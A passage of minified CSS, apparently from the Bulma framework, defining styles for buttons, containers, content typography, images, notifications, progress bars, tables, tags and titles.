rgba(50,152,220,.25)}.button.is-info.is-active,.button.is-info:active{background-color:#238cd1;border-color:transparent;color:#fff}.button.is-info[disabled],fieldset[disabled] .button.is-info{background-color:#3298dc;border-color:transparent;box-shadow:none}.button.is-info.is-inverted{background-color:#fff;color:#3298dc}.button.is-info.is-inverted.is-hovered,.button.is-info.is-inverted:hover{background-color:#f2f2f2}.button.is-info.is-inverted[disabled],fieldset[disabled] .button.is-info.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#3298dc}.button.is-info.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined{background-color:transparent;border-color:#3298dc;color:#3298dc}.button.is-info.is-outlined.is-focused,.button.is-info.is-outlined.is-hovered,.button.is-info.is-outlined:focus,.button.is-info.is-outlined:hover{background-color:#3298dc;border-color:#3298dc;color:#fff}.button.is-info.is-outlined.is-loading::after{border-color:transparent transparent #3298dc #3298dc!important}.button.is-info.is-outlined.is-loading.is-focused::after,.button.is-info.is-outlined.is-loading.is-hovered::after,.button.is-info.is-outlined.is-loading:focus::after,.button.is-info.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-info.is-outlined[disabled],fieldset[disabled] 
.button.is-info.is-outlined{background-color:transparent;border-color:#3298dc;box-shadow:none;color:#3298dc}.button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-info.is-inverted.is-outlined.is-focused,.button.is-info.is-inverted.is-outlined.is-hovered,.button.is-info.is-inverted.is-outlined:focus,.button.is-info.is-inverted.is-outlined:hover{background-color:#fff;color:#3298dc}.button.is-info.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-info.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-info.is-inverted.is-outlined.is-loading:focus::after,.button.is-info.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #3298dc #3298dc!important}.button.is-info.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-info.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-info.is-light{background-color:#eef6fc;color:#1d72aa}.button.is-info.is-light.is-hovered,.button.is-info.is-light:hover{background-color:#e3f1fa;border-color:transparent;color:#1d72aa}.button.is-info.is-light.is-active,.button.is-info.is-light:active{background-color:#d8ebf8;border-color:transparent;color:#1d72aa}.button.is-success{background-color:#48c774;border-color:transparent;color:#fff}.button.is-success.is-hovered,.button.is-success:hover{background-color:#3ec46d;border-color:transparent;color:#fff}.button.is-success.is-focused,.button.is-success:focus{border-color:transparent;color:#fff}.button.is-success.is-focused:not(:active),.button.is-success:focus:not(:active){box-shadow:0 0 0 .125em rgba(72,199,116,.25)}.button.is-success.is-active,.button.is-success:active{background-color:#3abb67;border-color:transparent;color:#fff}.button.is-success[disabled],fieldset[disabled] 
.button.is-success{background-color:#48c774;border-color:transparent;box-shadow:none}.button.is-success.is-inverted{background-color:#fff;color:#48c774}.button.is-success.is-inverted.is-hovered,.button.is-success.is-inverted:hover{background-color:#f2f2f2}.button.is-success.is-inverted[disabled],fieldset[disabled] .button.is-success.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#48c774}.button.is-success.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined{background-color:transparent;border-color:#48c774;color:#48c774}.button.is-success.is-outlined.is-focused,.button.is-success.is-outlined.is-hovered,.button.is-success.is-outlined:focus,.button.is-success.is-outlined:hover{background-color:#48c774;border-color:#48c774;color:#fff}.button.is-success.is-outlined.is-loading::after{border-color:transparent transparent #48c774 #48c774!important}.button.is-success.is-outlined.is-loading.is-focused::after,.button.is-success.is-outlined.is-loading.is-hovered::after,.button.is-success.is-outlined.is-loading:focus::after,.button.is-success.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-success.is-outlined[disabled],fieldset[disabled] 
.button.is-success.is-outlined{background-color:transparent;border-color:#48c774;box-shadow:none;color:#48c774}.button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-success.is-inverted.is-outlined.is-focused,.button.is-success.is-inverted.is-outlined.is-hovered,.button.is-success.is-inverted.is-outlined:focus,.button.is-success.is-inverted.is-outlined:hover{background-color:#fff;color:#48c774}.button.is-success.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-success.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-success.is-inverted.is-outlined.is-loading:focus::after,.button.is-success.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #48c774 #48c774!important}.button.is-success.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-success.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-success.is-light{background-color:#effaf3;color:#257942}.button.is-success.is-light.is-hovered,.button.is-success.is-light:hover{background-color:#e6f7ec;border-color:transparent;color:#257942}.button.is-success.is-light.is-active,.button.is-success.is-light:active{background-color:#dcf4e4;border-color:transparent;color:#257942}.button.is-warning{background-color:#ffdd57;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-warning.is-hovered,.button.is-warning:hover{background-color:#ffdb4a;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-warning.is-focused,.button.is-warning:focus{border-color:transparent;color:rgba(0,0,0,.7)}.button.is-warning.is-focused:not(:active),.button.is-warning:focus:not(:active){box-shadow:0 0 0 .125em rgba(255,221,87,.25)}.button.is-warning.is-active,.button.is-warning:active{background-color:#ffd83d;border-color:transparent;color:rgba(0,0,0,.7)}.button.is-warning[disabled],fieldset[disabled] 
.button.is-warning{background-color:#ffdd57;border-color:transparent;box-shadow:none}.button.is-warning.is-inverted{background-color:rgba(0,0,0,.7);color:#ffdd57}.button.is-warning.is-inverted.is-hovered,.button.is-warning.is-inverted:hover{background-color:rgba(0,0,0,.7)}.button.is-warning.is-inverted[disabled],fieldset[disabled] .button.is-warning.is-inverted{background-color:rgba(0,0,0,.7);border-color:transparent;box-shadow:none;color:#ffdd57}.button.is-warning.is-loading::after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined{background-color:transparent;border-color:#ffdd57;color:#ffdd57}.button.is-warning.is-outlined.is-focused,.button.is-warning.is-outlined.is-hovered,.button.is-warning.is-outlined:focus,.button.is-warning.is-outlined:hover{background-color:#ffdd57;border-color:#ffdd57;color:rgba(0,0,0,.7)}.button.is-warning.is-outlined.is-loading::after{border-color:transparent transparent #ffdd57 #ffdd57!important}.button.is-warning.is-outlined.is-loading.is-focused::after,.button.is-warning.is-outlined.is-loading.is-hovered::after,.button.is-warning.is-outlined.is-loading:focus::after,.button.is-warning.is-outlined.is-loading:hover::after{border-color:transparent transparent rgba(0,0,0,.7) rgba(0,0,0,.7)!important}.button.is-warning.is-outlined[disabled],fieldset[disabled] 
.button.is-warning.is-outlined{background-color:transparent;border-color:#ffdd57;box-shadow:none;color:#ffdd57}.button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:rgba(0,0,0,.7);color:rgba(0,0,0,.7)}.button.is-warning.is-inverted.is-outlined.is-focused,.button.is-warning.is-inverted.is-outlined.is-hovered,.button.is-warning.is-inverted.is-outlined:focus,.button.is-warning.is-inverted.is-outlined:hover{background-color:rgba(0,0,0,.7);color:#ffdd57}.button.is-warning.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-warning.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-warning.is-inverted.is-outlined.is-loading:focus::after,.button.is-warning.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #ffdd57 #ffdd57!important}.button.is-warning.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-warning.is-inverted.is-outlined{background-color:transparent;border-color:rgba(0,0,0,.7);box-shadow:none;color:rgba(0,0,0,.7)}.button.is-warning.is-light{background-color:#fffbeb;color:#947600}.button.is-warning.is-light.is-hovered,.button.is-warning.is-light:hover{background-color:#fff8de;border-color:transparent;color:#947600}.button.is-warning.is-light.is-active,.button.is-warning.is-light:active{background-color:#fff6d1;border-color:transparent;color:#947600}.button.is-danger{background-color:#f14668;border-color:transparent;color:#fff}.button.is-danger.is-hovered,.button.is-danger:hover{background-color:#f03a5f;border-color:transparent;color:#fff}.button.is-danger.is-focused,.button.is-danger:focus{border-color:transparent;color:#fff}.button.is-danger.is-focused:not(:active),.button.is-danger:focus:not(:active){box-shadow:0 0 0 .125em rgba(241,70,104,.25)}.button.is-danger.is-active,.button.is-danger:active{background-color:#ef2e55;border-color:transparent;color:#fff}.button.is-danger[disabled],fieldset[disabled] 
.button.is-danger{background-color:#f14668;border-color:transparent;box-shadow:none}.button.is-danger.is-inverted{background-color:#fff;color:#f14668}.button.is-danger.is-inverted.is-hovered,.button.is-danger.is-inverted:hover{background-color:#f2f2f2}.button.is-danger.is-inverted[disabled],fieldset[disabled] .button.is-danger.is-inverted{background-color:#fff;border-color:transparent;box-shadow:none;color:#f14668}.button.is-danger.is-loading::after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;color:#f14668}.button.is-danger.is-outlined.is-focused,.button.is-danger.is-outlined.is-hovered,.button.is-danger.is-outlined:focus,.button.is-danger.is-outlined:hover{background-color:#f14668;border-color:#f14668;color:#fff}.button.is-danger.is-outlined.is-loading::after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-outlined.is-loading.is-focused::after,.button.is-danger.is-outlined.is-loading.is-hovered::after,.button.is-danger.is-outlined.is-loading:focus::after,.button.is-danger.is-outlined.is-loading:hover::after{border-color:transparent transparent #fff #fff!important}.button.is-danger.is-outlined[disabled],fieldset[disabled] 
.button.is-danger.is-outlined{background-color:transparent;border-color:#f14668;box-shadow:none;color:#f14668}.button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;color:#fff}.button.is-danger.is-inverted.is-outlined.is-focused,.button.is-danger.is-inverted.is-outlined.is-hovered,.button.is-danger.is-inverted.is-outlined:focus,.button.is-danger.is-inverted.is-outlined:hover{background-color:#fff;color:#f14668}.button.is-danger.is-inverted.is-outlined.is-loading.is-focused::after,.button.is-danger.is-inverted.is-outlined.is-loading.is-hovered::after,.button.is-danger.is-inverted.is-outlined.is-loading:focus::after,.button.is-danger.is-inverted.is-outlined.is-loading:hover::after{border-color:transparent transparent #f14668 #f14668!important}.button.is-danger.is-inverted.is-outlined[disabled],fieldset[disabled] .button.is-danger.is-inverted.is-outlined{background-color:transparent;border-color:#fff;box-shadow:none;color:#fff}.button.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.button.is-danger.is-light.is-hovered,.button.is-danger.is-light:hover{background-color:#fde0e6;border-color:transparent;color:#cc0f35}.button.is-danger.is-light.is-active,.button.is-danger.is-light:active{background-color:#fcd4dc;border-color:transparent;color:#cc0f35}.button.is-small{border-radius:2px;font-size:.75rem}.button.is-normal{font-size:1rem}.button.is-medium{font-size:1.25rem}.button.is-large{font-size:1.5rem}.button[disabled],fieldset[disabled] .button{background-color:#fff;border-color:#dbdbdb;box-shadow:none;opacity:.5}.button.is-fullwidth{display:flex;width:100%}.button.is-loading{color:transparent!important;pointer-events:none}.button.is-loading::after{position:absolute;left:calc(50% - (1em / 2));top:calc(50% - (1em / 2));position:absolute!important}.button.is-static{background-color:#f5f5f5;border-color:#dbdbdb;color:#7a7a7a;box-shadow:none;pointer-events:none}.button.is-rounded{border-radius:290486px;padding-left:calc(1em + 
.25em);padding-right:calc(1em + .25em)}.buttons{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.buttons .button{margin-bottom:.5rem}.buttons .button:not(:last-child):not(.is-fullwidth){margin-right:.5rem}.buttons:last-child{margin-bottom:-.5rem}.buttons:not(:last-child){margin-bottom:1rem}.buttons.are-small .button:not(.is-normal):not(.is-medium):not(.is-large){border-radius:2px;font-size:.75rem}.buttons.are-medium .button:not(.is-small):not(.is-normal):not(.is-large){font-size:1.25rem}.buttons.are-large .button:not(.is-small):not(.is-normal):not(.is-medium){font-size:1.5rem}.buttons.has-addons .button:not(:first-child){border-bottom-left-radius:0;border-top-left-radius:0}.buttons.has-addons .button:not(:last-child){border-bottom-right-radius:0;border-top-right-radius:0;margin-right:-1px}.buttons.has-addons .button:last-child{margin-right:0}.buttons.has-addons .button.is-hovered,.buttons.has-addons .button:hover{z-index:2}.buttons.has-addons .button.is-active,.buttons.has-addons .button.is-focused,.buttons.has-addons .button.is-selected,.buttons.has-addons .button:active,.buttons.has-addons .button:focus{z-index:3}.buttons.has-addons .button.is-active:hover,.buttons.has-addons .button.is-focused:hover,.buttons.has-addons .button.is-selected:hover,.buttons.has-addons .button:active:hover,.buttons.has-addons .button:focus:hover{z-index:4}.buttons.has-addons .button.is-expanded{flex-grow:1;flex-shrink:1}.buttons.is-centered{justify-content:center}.buttons.is-centered:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}.buttons.is-right{justify-content:flex-end}.buttons.is-right:not(.has-addons) .button:not(.is-fullwidth){margin-left:.25rem;margin-right:.25rem}.container{flex-grow:1;margin:0 auto;position:relative;width:auto}.container.is-fluid{max-width:none;padding-left:32px;padding-right:32px;width:100%}@media screen and (min-width:1024px){.container{max-width:960px}}@media screen and 
(max-width:1215px){.container.is-widescreen{max-width:1152px}}@media screen and (max-width:1407px){.container.is-fullhd{max-width:1344px}}@media screen and (min-width:1216px){.container{max-width:1152px}}@media screen and (min-width:1408px){.container{max-width:1344px}}.content li+li{margin-top:.25em}.content blockquote:not(:last-child),.content dl:not(:last-child),.content ol:not(:last-child),.content p:not(:last-child),.content pre:not(:last-child),.content table:not(:last-child),.content ul:not(:last-child){margin-bottom:1em}.content h1,.content h2,.content h3,.content h4,.content h5,.content h6{color:#363636;font-weight:600;line-height:1.125}.content h1{font-size:2em;margin-bottom:.5em}.content h1:not(:first-child){margin-top:1em}.content h2{font-size:1.75em;margin-bottom:.5714em}.content h2:not(:first-child){margin-top:1.1428em}.content h3{font-size:1.5em;margin-bottom:.6666em}.content h3:not(:first-child){margin-top:1.3333em}.content h4{font-size:1.25em;margin-bottom:.8em}.content h5{font-size:1.125em;margin-bottom:.8888em}.content h6{font-size:1em;margin-bottom:1em}.content blockquote{background-color:#f5f5f5;border-left:5px solid #dbdbdb;padding:1.25em 1.5em}.content ol{list-style-position:outside;margin-left:2em;margin-top:1em}.content ol:not([type]){list-style-type:decimal}.content ol:not([type]).is-lower-alpha{list-style-type:lower-alpha}.content ol:not([type]).is-lower-roman{list-style-type:lower-roman}.content ol:not([type]).is-upper-alpha{list-style-type:upper-alpha}.content ol:not([type]).is-upper-roman{list-style-type:upper-roman}.content ul{list-style:disc outside;margin-left:2em;margin-top:1em}.content ul ul{list-style-type:circle;margin-top:.5em}.content ul ul ul{list-style-type:square}.content dd{margin-left:2em}.content figure{margin-left:2em;margin-right:2em;text-align:center}.content figure:not(:first-child){margin-top:2em}.content figure:not(:last-child){margin-bottom:2em}.content figure img{display:inline-block}.content figure 
figcaption{font-style:italic}.content pre{-webkit-overflow-scrolling:touch;overflow-x:auto;padding:1.25em 1.5em;white-space:pre;word-wrap:normal}.content sub,.content sup{font-size:75%}.content table{width:100%}.content table td,.content table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.content table th{color:#363636}.content table th:not([align]){text-align:left}.content table thead td,.content table thead th{border-width:0 0 2px;color:#363636}.content table tfoot td,.content table tfoot th{border-width:2px 0 0;color:#363636}.content table tbody tr:last-child td,.content table tbody tr:last-child th{border-bottom-width:0}.content .tabs li+li{margin-top:0}.content.is-small{font-size:.75rem}.content.is-medium{font-size:1.25rem}.content.is-large{font-size:1.5rem}.icon{align-items:center;display:inline-flex;justify-content:center;height:1.5rem;width:1.5rem}.icon.is-small{height:1rem;width:1rem}.icon.is-medium{height:2rem;width:2rem}.icon.is-large{height:3rem;width:3rem}.image{display:block;position:relative}.image img{display:block;height:auto;width:100%}.image img.is-rounded{border-radius:290486px}.image.is-fullwidth{width:100%}.image.is-16by9 .has-ratio,.image.is-16by9 img,.image.is-1by1 .has-ratio,.image.is-1by1 img,.image.is-1by2 .has-ratio,.image.is-1by2 img,.image.is-1by3 .has-ratio,.image.is-1by3 img,.image.is-2by1 .has-ratio,.image.is-2by1 img,.image.is-2by3 .has-ratio,.image.is-2by3 img,.image.is-3by1 .has-ratio,.image.is-3by1 img,.image.is-3by2 .has-ratio,.image.is-3by2 img,.image.is-3by4 .has-ratio,.image.is-3by4 img,.image.is-3by5 .has-ratio,.image.is-3by5 img,.image.is-4by3 .has-ratio,.image.is-4by3 img,.image.is-4by5 .has-ratio,.image.is-4by5 img,.image.is-5by3 .has-ratio,.image.is-5by3 img,.image.is-5by4 .has-ratio,.image.is-5by4 img,.image.is-9by16 .has-ratio,.image.is-9by16 img,.image.is-square .has-ratio,.image.is-square 
img{height:100%;width:100%}.image.is-1by1,.image.is-square{padding-top:100%}.image.is-5by4{padding-top:80%}.image.is-4by3{padding-top:75%}.image.is-3by2{padding-top:66.6666%}.image.is-5by3{padding-top:60%}.image.is-16by9{padding-top:56.25%}.image.is-2by1{padding-top:50%}.image.is-3by1{padding-top:33.3333%}.image.is-4by5{padding-top:125%}.image.is-3by4{padding-top:133.3333%}.image.is-2by3{padding-top:150%}.image.is-3by5{padding-top:166.6666%}.image.is-9by16{padding-top:177.7777%}.image.is-1by2{padding-top:200%}.image.is-1by3{padding-top:300%}.image.is-16x16{height:16px;width:16px}.image.is-24x24{height:24px;width:24px}.image.is-32x32{height:32px;width:32px}.image.is-48x48{height:48px;width:48px}.image.is-64x64{height:64px;width:64px}.image.is-96x96{height:96px;width:96px}.image.is-128x128{height:128px;width:128px}.notification{background-color:#f5f5f5;border-radius:4px;padding:1.25rem 2.5rem 1.25rem 1.5rem;position:relative}.notification a:not(.button):not(.dropdown-item){color:currentColor;text-decoration:underline}.notification strong{color:currentColor}.notification code,.notification pre{background:#fff}.notification pre code{background:0 0}.notification>.delete{position:absolute;right:.5rem;top:.5rem}.notification .content,.notification .subtitle,.notification 
.title{color:currentColor}.notification.is-white{background-color:#fff;color:#0a0a0a}.notification.is-black{background-color:#0a0a0a;color:#fff}.notification.is-light{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.notification.is-dark{background-color:#363636;color:#fff}.notification.is-primary{background-color:#00d1b2;color:#fff}.notification.is-primary.is-light{background-color:#ebfffc;color:#00947e}.notification.is-link{background-color:#3273dc;color:#fff}.notification.is-link.is-light{background-color:#eef3fc;color:#2160c4}.notification.is-info{background-color:#3298dc;color:#fff}.notification.is-info.is-light{background-color:#eef6fc;color:#1d72aa}.notification.is-success{background-color:#48c774;color:#fff}.notification.is-success.is-light{background-color:#effaf3;color:#257942}.notification.is-warning{background-color:#ffdd57;color:rgba(0,0,0,.7)}.notification.is-warning.is-light{background-color:#fffbeb;color:#947600}.notification.is-danger{background-color:#f14668;color:#fff}.notification.is-danger.is-light{background-color:#feecf0;color:#cc0f35}.progress{-moz-appearance:none;-webkit-appearance:none;border:none;border-radius:290486px;display:block;height:1rem;overflow:hidden;padding:0;width:100%}.progress::-webkit-progress-bar{background-color:#ededed}.progress::-webkit-progress-value{background-color:#4a4a4a}.progress::-moz-progress-bar{background-color:#4a4a4a}.progress::-ms-fill{background-color:#4a4a4a;border:none}.progress.is-white::-webkit-progress-value{background-color:#fff}.progress.is-white::-moz-progress-bar{background-color:#fff}.progress.is-white::-ms-fill{background-color:#fff}.progress.is-white:indeterminate{background-image:linear-gradient(to right,#fff 30%,#ededed 30%)}.progress.is-black::-webkit-progress-value{background-color:#0a0a0a}.progress.is-black::-moz-progress-bar{background-color:#0a0a0a}.progress.is-black::-ms-fill{background-color:#0a0a0a}.progress.is-black:indeterminate{background-image:linear-gradient(to right,#0a0a0a 
30%,#ededed 30%)}.progress.is-light::-webkit-progress-value{background-color:#f5f5f5}.progress.is-light::-moz-progress-bar{background-color:#f5f5f5}.progress.is-light::-ms-fill{background-color:#f5f5f5}.progress.is-light:indeterminate{background-image:linear-gradient(to right,#f5f5f5 30%,#ededed 30%)}.progress.is-dark::-webkit-progress-value{background-color:#363636}.progress.is-dark::-moz-progress-bar{background-color:#363636}.progress.is-dark::-ms-fill{background-color:#363636}.progress.is-dark:indeterminate{background-image:linear-gradient(to right,#363636 30%,#ededed 30%)}.progress.is-primary::-webkit-progress-value{background-color:#00d1b2}.progress.is-primary::-moz-progress-bar{background-color:#00d1b2}.progress.is-primary::-ms-fill{background-color:#00d1b2}.progress.is-primary:indeterminate{background-image:linear-gradient(to right,#00d1b2 30%,#ededed 30%)}.progress.is-link::-webkit-progress-value{background-color:#3273dc}.progress.is-link::-moz-progress-bar{background-color:#3273dc}.progress.is-link::-ms-fill{background-color:#3273dc}.progress.is-link:indeterminate{background-image:linear-gradient(to right,#3273dc 30%,#ededed 30%)}.progress.is-info::-webkit-progress-value{background-color:#3298dc}.progress.is-info::-moz-progress-bar{background-color:#3298dc}.progress.is-info::-ms-fill{background-color:#3298dc}.progress.is-info:indeterminate{background-image:linear-gradient(to right,#3298dc 30%,#ededed 30%)}.progress.is-success::-webkit-progress-value{background-color:#48c774}.progress.is-success::-moz-progress-bar{background-color:#48c774}.progress.is-success::-ms-fill{background-color:#48c774}.progress.is-success:indeterminate{background-image:linear-gradient(to right,#48c774 30%,#ededed 30%)}.progress.is-warning::-webkit-progress-value{background-color:#ffdd57}.progress.is-warning::-moz-progress-bar{background-color:#ffdd57}.progress.is-warning::-ms-fill{background-color:#ffdd57}.progress.is-warning:indeterminate{background-image:linear-gradient(to 
right,#ffdd57 30%,#ededed 30%)}.progress.is-danger::-webkit-progress-value{background-color:#f14668}.progress.is-danger::-moz-progress-bar{background-color:#f14668}.progress.is-danger::-ms-fill{background-color:#f14668}.progress.is-danger:indeterminate{background-image:linear-gradient(to right,#f14668 30%,#ededed 30%)}.progress:indeterminate{-webkit-animation-duration:1.5s;animation-duration:1.5s;-webkit-animation-iteration-count:infinite;animation-iteration-count:infinite;-webkit-animation-name:moveIndeterminate;animation-name:moveIndeterminate;-webkit-animation-timing-function:linear;animation-timing-function:linear;background-color:#ededed;background-image:linear-gradient(to right,#4a4a4a 30%,#ededed 30%);background-position:top left;background-repeat:no-repeat;background-size:150% 150%}.progress:indeterminate::-webkit-progress-bar{background-color:transparent}.progress:indeterminate::-moz-progress-bar{background-color:transparent}.progress.is-small{height:.75rem}.progress.is-medium{height:1.25rem}.progress.is-large{height:1.5rem}@-webkit-keyframes moveIndeterminate{from{background-position:200% 0}to{background-position:-200% 0}}@keyframes moveIndeterminate{from{background-position:200% 0}to{background-position:-200% 0}}.table{background-color:#fff;color:#363636}.table td,.table th{border:1px solid #dbdbdb;border-width:0 0 1px;padding:.5em .75em;vertical-align:top}.table td.is-white,.table th.is-white{background-color:#fff;border-color:#fff;color:#0a0a0a}.table td.is-black,.table th.is-black{background-color:#0a0a0a;border-color:#0a0a0a;color:#fff}.table td.is-light,.table th.is-light{background-color:#f5f5f5;border-color:#f5f5f5;color:rgba(0,0,0,.7)}.table td.is-dark,.table th.is-dark{background-color:#363636;border-color:#363636;color:#fff}.table td.is-primary,.table th.is-primary{background-color:#00d1b2;border-color:#00d1b2;color:#fff}.table td.is-link,.table th.is-link{background-color:#3273dc;border-color:#3273dc;color:#fff}.table td.is-info,.table 
th.is-info{background-color:#3298dc;border-color:#3298dc;color:#fff}.table td.is-success,.table th.is-success{background-color:#48c774;border-color:#48c774;color:#fff}.table td.is-warning,.table th.is-warning{background-color:#ffdd57;border-color:#ffdd57;color:rgba(0,0,0,.7)}.table td.is-danger,.table th.is-danger{background-color:#f14668;border-color:#f14668;color:#fff}.table td.is-narrow,.table th.is-narrow{white-space:nowrap;width:1%}.table td.is-selected,.table th.is-selected{background-color:#00d1b2;color:#fff}.table td.is-selected a,.table td.is-selected strong,.table th.is-selected a,.table th.is-selected strong{color:currentColor}.table th{color:#363636}.table th:not([align]){text-align:left}.table tr.is-selected{background-color:#00d1b2;color:#fff}.table tr.is-selected a,.table tr.is-selected strong{color:currentColor}.table tr.is-selected td,.table tr.is-selected th{border-color:#fff;color:currentColor}.table thead{background-color:transparent}.table thead td,.table thead th{border-width:0 0 2px;color:#363636}.table tfoot{background-color:transparent}.table tfoot td,.table tfoot th{border-width:2px 0 0;color:#363636}.table tbody{background-color:transparent}.table tbody tr:last-child td,.table tbody tr:last-child th{border-bottom-width:0}.table.is-bordered td,.table.is-bordered th{border-width:1px}.table.is-bordered tr:last-child td,.table.is-bordered tr:last-child th{border-bottom-width:1px}.table.is-fullwidth{width:100%}.table.is-hoverable tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover{background-color:#fafafa}.table.is-hoverable.is-striped tbody tr:not(.is-selected):hover:nth-child(even){background-color:#f5f5f5}.table.is-narrow td,.table.is-narrow th{padding:.25em .5em}.table.is-striped tbody 
tr:not(.is-selected):nth-child(even){background-color:#fafafa}.table-container{-webkit-overflow-scrolling:touch;overflow:auto;overflow-y:hidden;max-width:100%}.tags{align-items:center;display:flex;flex-wrap:wrap;justify-content:flex-start}.tags .tag{margin-bottom:.5rem}.tags .tag:not(:last-child){margin-right:.5rem}.tags:last-child{margin-bottom:-.5rem}.tags:not(:last-child){margin-bottom:1rem}.tags.are-medium .tag:not(.is-normal):not(.is-large){font-size:1rem}.tags.are-large .tag:not(.is-normal):not(.is-medium){font-size:1.25rem}.tags.is-centered{justify-content:center}.tags.is-centered .tag{margin-right:.25rem;margin-left:.25rem}.tags.is-right{justify-content:flex-end}.tags.is-right .tag:not(:first-child){margin-left:.5rem}.tags.is-right .tag:not(:last-child){margin-right:0}.tags.has-addons .tag{margin-right:0}.tags.has-addons .tag:not(:first-child){margin-left:0;border-bottom-left-radius:0;border-top-left-radius:0}.tags.has-addons .tag:not(:last-child){border-bottom-right-radius:0;border-top-right-radius:0}.tag:not(body){align-items:center;background-color:#f5f5f5;border-radius:4px;color:#4a4a4a;display:inline-flex;font-size:.75rem;height:2em;justify-content:center;line-height:1.5;padding-left:.75em;padding-right:.75em;white-space:nowrap}.tag:not(body) 
.delete{margin-left:.25rem;margin-right:-.375rem}.tag:not(body).is-white{background-color:#fff;color:#0a0a0a}.tag:not(body).is-black{background-color:#0a0a0a;color:#fff}.tag:not(body).is-light{background-color:#f5f5f5;color:rgba(0,0,0,.7)}.tag:not(body).is-dark{background-color:#363636;color:#fff}.tag:not(body).is-primary{background-color:#00d1b2;color:#fff}.tag:not(body).is-primary.is-light{background-color:#ebfffc;color:#00947e}.tag:not(body).is-link{background-color:#3273dc;color:#fff}.tag:not(body).is-link.is-light{background-color:#eef3fc;color:#2160c4}.tag:not(body).is-info{background-color:#3298dc;color:#fff}.tag:not(body).is-info.is-light{background-color:#eef6fc;color:#1d72aa}.tag:not(body).is-success{background-color:#48c774;color:#fff}.tag:not(body).is-success.is-light{background-color:#effaf3;color:#257942}.tag:not(body).is-warning{background-color:#ffdd57;color:rgba(0,0,0,.7)}.tag:not(body).is-warning.is-light{background-color:#fffbeb;color:#947600}.tag:not(body).is-danger{background-color:#f14668;color:#fff}.tag:not(body).is-danger.is-light{background-color:#feecf0;color:#cc0f35}.tag:not(body).is-normal{font-size:.75rem}.tag:not(body).is-medium{font-size:1rem}.tag:not(body).is-large{font-size:1.25rem}.tag:not(body) .icon:first-child:not(:last-child){margin-left:-.375em;margin-right:.1875em}.tag:not(body) .icon:last-child:not(:first-child){margin-left:.1875em;margin-right:-.375em}.tag:not(body) .icon:first-child:last-child{margin-left:-.375em;margin-right:-.375em}.tag:not(body).is-delete{margin-left:1px;padding:0;position:relative;width:2em}.tag:not(body).is-delete::after,.tag:not(body).is-delete::before{background-color:currentColor;content:"";display:block;left:50%;position:absolute;top:50%;transform:translateX(-50%) translateY(-50%) rotate(45deg);transform-origin:center 
center}.tag:not(body).is-delete::before{height:1px;width:50%}.tag:not(body).is-delete::after{height:50%;width:1px}.tag:not(body).is-delete:focus,.tag:not(body).is-delete:hover{background-color:#e8e8e8}.tag:not(body).is-delete:active{background-color:#dbdbdb}.tag:not(body).is-rounded{border-radius:290486px}a.tag:hover{text-decoration:underline}.subtitle,.title{word-break:break-word}.subtitle em,.subtitle span,.title em,.title span{font-weight:inherit}.subtitle sub,.title sub{font-size:.75em}.subtitle sup,.title sup{font-size:.75em}.subtitle .tag,.title .tag{vertical-align:middle}.title{color:#363636;font-size:2rem;font-weight:600;line-height:1.125}.title strong{color:inherit;font-weight:inherit}.title+.highlight{margin-top:-.75rem}.title:not(.is-spaced)+.subtitle{margin-top:-1.25rem}.title.is-1{font-size:3rem}.title.is-2{font-size:2.5rem}.title.is-3{font-size:2rem}.title.is-4{font-size:1.5rem}.title.is-5{font-size:1.25rem}.title.is-6{font-size:1rem}.title.is-7{font-size:.75rem}.subtitle{color:#4a4a4a;font-size:1.25rem;font-weight:400;line-height:1.25}.subtitle strong{color:#363636;font-weight:600}.subtitle:not(.is-spaced)+.title{margin-top:-1.25rem}.subtitle.is-1{font-size:3rem}.subtitle.is-2{font-size:2.5rem}.subtitle.is-3{font-size:2rem}.subtitle.is-4{font-size:1.5rem}.subtitle.is-5{font-size:1.25rem}.subtitle.is-6{font-size:1rem}.subtitle.is-7{font-size:.75rem}.heading{display:block;font-size:11px;letter-spacing:1px;margin-bottom:5px;text-transform:uppercase}.highlight{font-weight:400;max-width:100%;overflow:hidden;padding:0}.highlight pre{overflow:auto;max-width:100%}.number{align-items:center;background-color:#f5f5f5;border-radius:290486px;display:inline-flex;font-size:1.25rem;height:2em;justify-content:center;margin-right:1.5rem;min-width:2.5em;padding:.25rem .5rem;text-align:center;vertical-align:top}.input,.select 